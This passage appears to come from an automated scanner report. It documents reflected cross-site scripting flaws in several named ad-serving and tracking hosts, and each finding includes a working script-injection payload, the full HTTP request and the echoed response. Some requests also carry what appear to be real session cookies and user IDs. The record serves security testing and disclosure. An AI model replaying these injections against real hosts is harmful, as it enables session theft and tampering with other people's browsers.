The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 99034<script>alert(1)</script>23c6ef95413 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/74269799034<script>alert(1)</script>23c6ef95413?d=4325897289836481830 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MlCqBQA%3D"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; rb2=Ch0KBjcxMjE1Nhij2_fAGiINMXZvb2Z5NmEwdGsxdwo4CgY3MTIxODEY5Lqa4BYiKFdIOXFZbGQyUW5KQURXMWRCd1Y0VkFaVWFYc1FkUUpDRFY5aVgxcFAKIwoGNzQyNjk3GOilqtsWIhM0MzI1ODk3Mjg5ODM2NDgxODMwCiQKBjc1MzI5MhjXvfa6FyIUQUctMDAwMDAwMDEzODkzNTg1NTQKNAoGODA2MjA1GOihjekdIiQ5ZWQzZjJmMi03ZjVhLTExZTAtYTA3YS0wMDI1OTAwOWE5ZTQQAQ; ut="1%3AVZDLkoMgEEX%2FhbULQGU0f6OiQWMjDxOiIf8%2B2qRSM9tT9%2FStvi%2Fy4OTyIrd%2BC4uTnlyIvU%2Bhjsx3JbSRRZp5ZmsRmQvQOwTWyh2ORGGYQeDCDCsm7kNK1MuzOkArpyUl9NBtCGb%2BVeypaJanlgo2eYDG5AkY362n4q7rDUGnZjFuotAHnFXVfLUGNRrS4d3ZQ%2FP0R%2BiPpqqrpcqcbeNe%2FoPLX%2Bggt3A2KuCxiH7IfGkWjIC2qU5MEx4CxT%2F9gwAEdXrdD3YuEcg0js%2FpE%2BfTHB8jGWkbrXs34tzk%2Ff4F"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 13 Jun 2011 11:17:25 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/74269799034<script>alert(1)</script>23c6ef95413

4.54. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50807"><script>alert(1)</script>ead8b635e1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1921978&50807"><script>alert(1)</script>ead8b635e1b=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:02:38 GMT
Pragma: no-cache
Content-Length: 4715
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ads.bluelithium.com/imageclick?50807"><script>alert(1)</script>ead8b635e1b=1&Z=1x1&s=1921978&_salt=3940171247&t=2" target="_parent">
...[SNIP]...

4.55. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea43f"-alert(1)-"b606499e7cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1921978&ea43f"-alert(1)-"b606499e7cb=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:39 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:02:39 GMT
Pragma: no-cache
Content-Length: 4670
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&ea43f"-alert(1)-"b606499e7cb=1&s=1921978&_salt=2707350494";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

4.56. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 4bd29<script>alert(1)</script>872b14ba594 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1290669&pid=7557724bd29<script>alert(1)</script>872b14ba594&ps=-1&zw=600&zh=240&url=http%3A//tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/&v=5&dct=Review%20of%20Game%20of%20Thrones%2C%20Baelor%20-%20Tuned%20In%20-%20TIME.com&metakw=uncategorized,game%20of%20thrones HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16t51ko094k0ku; TData=99999%7C51134%7C56282%7C61674%7C57094%7C60740%7C56297%7C57130%7C57129%7C61576%7C51184%7C53380%7C60489%7C60515%7C52615%7C57289%7C52946%7C53656%7C55401%7C50507%7C50557%7C54255%7C53778%7C51182%7C54252%7C50961%7C54209%7C56988%7C57372%7C56780%7C56232%7C56142%7C56768%7C56761%7C56681%7C56153_Mon%2C%2006%20Jun%202011%2015%3A43%3A48%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:18 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2537


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "7557724bd29<script>alert(1)</script>872b14ba594"

   
                                                           </head>
...[SNIP]...

4.57. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 2af77--><script>alert(1)</script>56fc6852dbc was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=12906692af77--><script>alert(1)</script>56fc6852dbc&pid=755772&ps=-1&zw=600&zh=240&url=http%3A//tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/&v=5&dct=Review%20of%20Game%20of%20Thrones%2C%20Baelor%20-%20Tuned%20In%20-%20TIME.com&metakw=uncategorized,game%20of%20thrones HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16t51ko094k0ku; TData=99999%7C51134%7C56282%7C61674%7C57094%7C60740%7C56297%7C57130%7C57129%7C61576%7C51184%7C53380%7C60489%7C60515%7C52615%7C57289%7C52946%7C53656%7C55401%7C50507%7C50557%7C54255%7C53778%7C51182%7C54252%7C50961%7C54209%7C56988%7C57372%7C56780%7C56232%7C56142%7C56768%7C56761%7C56681%7C56153_Mon%2C%2006%20Jun%202011%2015%3A43%3A48%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:16 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3328
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "12906692af77--><script>alert(1)</script>56fc6852dbc" -->
...[SNIP]...

4.58. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 9d380--><script>alert(1)</script>6eeac4dc4ff was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1290669&pid=755772&ps=-19d380--><script>alert(1)</script>6eeac4dc4ff&zw=600&zh=240&url=http%3A//tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/&v=5&dct=Review%20of%20Game%20of%20Thrones%2C%20Baelor%20-%20Tuned%20In%20-%20TIME.com&metakw=uncategorized,game%20of%20thrones HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16t51ko094k0ku; TData=99999%7C51134%7C56282%7C61674%7C57094%7C60740%7C56297%7C57130%7C57129%7C61576%7C51184%7C53380%7C60489%7C60515%7C52615%7C57289%7C52946%7C53656%7C55401%7C50507%7C50557%7C54255%7C53778%7C51182%7C54252%7C50961%7C54209%7C56988%7C57372%7C56780%7C56232%7C56142%7C56768%7C56761%7C56681%7C56153_Mon%2C%2006%20Jun%202011%2015%3A43%3A48%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:21 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3767
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-19d380--><script>alert(1)</script>6eeac4dc4ff" -->
   
...[SNIP]...

4.59. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b021f'%3balert(1)//747c2682e5c was submitted in the admeld_adprovider_id parameter. This input was echoed as b021f';alert(1)//747c2682e5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=567b021f'%3balert(1)//747c2682e5c&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmid=20772879917; ueid=1461734246|1305465412|8|2; lpnid=3000003

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 13 Jun 2011 11:21:21 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 198

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=567b021f';alert(1)//747c2682e5c&external_user_id=1461734246|1305465412|8|2&expiration=1310556081"/>');

4.60. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b39da'%3balert(1)//140d16c61eb was submitted in the admeld_callback parameter. This input was echoed as b39da';alert(1)//140d16c61eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchb39da'%3balert(1)//140d16c61eb HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmid=20772879917; ueid=1461734246|1305465412|8|2; lpnid=3000003

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 13 Jun 2011 11:21:22 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 198

document.write('<img width="0" height="0" src="http://tag.admeld.com/matchb39da';alert(1)//140d16c61eb?admeld_adprovider_id=567&external_user_id=1461734246|1305465412|8|2&expiration=1310556082"/>');

4.61. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 910f3<script>alert(1)</script>239728372ad was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?callback_url=http%3A%2F%2Fpix04.revsci.net%2FD10889%2Fa1%2F0%2F3%2F0.gif%3FD%3DDM_LOC%3Dhttp%3A%2F%2Fbizo.com%3F&api_key=bbe168f7d7bf46369bbe29684c749a27910f3<script>alert(1)</script>239728372ad HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe3KZNYajTv8WFExkNK7HUtFp4B4dlWpgdjompglDEY6Fz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvaVisNuwTZJ71H7ipM0dUEU19JRFsRyXovJE93rVCVYWJZWr1XIQIIGVSLisisBipGPv3ipBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:26:06 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (bbe168f7d7bf46369bbe29684c749a27910f3<script>alert(1)</script>239728372ad)

4.62. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 9ef78<script>alert(1)</script>834499b1128 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?callback_url=9ef78<script>alert(1)</script>834499b1128&api_key=bbe168f7d7bf46369bbe29684c749a27 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe3KZNYajTv8WFExkNK7HUtFp4B4dlWpgdjompglDEY6Fz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvaVisNuwTZJ71H7ipM0dUEU19JRFsRyXovJE93rVCVYWJZWr1XIQIIGVSLisisBipGPv3ipBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:26:03 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 9ef78<script>alert(1)</script>834499b1128

4.63. http://api.dimestore.com/viapi [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload fca9f<a>6d3fd3426f0 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=a51773776fca9f<a>6d3fd3426f0 HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MSR/iview/313679802/direct;wi.160;hi.600/01/6942356?click=http://n4403ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/h%3B240399958%3B0-0%3B0%3B39168450%3B2321-160/600%3B41978481/41996268/1%3B%3B%7Eokv%3D%3Bsect%3Dros%3Bsz%3D160x600%3Btile%3D4%3B%7Eaopt%3D2/1/83/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 13 Jun 2011 11:23:33 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: pixel_a51773776fca9f<a>6d3fd3426f0=1; Expires=Tue, 12-Jun-2012 11:23:33 GMT
Content-Length: 55

// DIMESTORE PIXEL OK -- a51773776fca9f<a>6d3fd3426f0

4.64. http://api.mixpanel.com/track/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.mixpanel.com
Path:   /track/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ea105<script>alert(1)</script>760dc7e2979 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

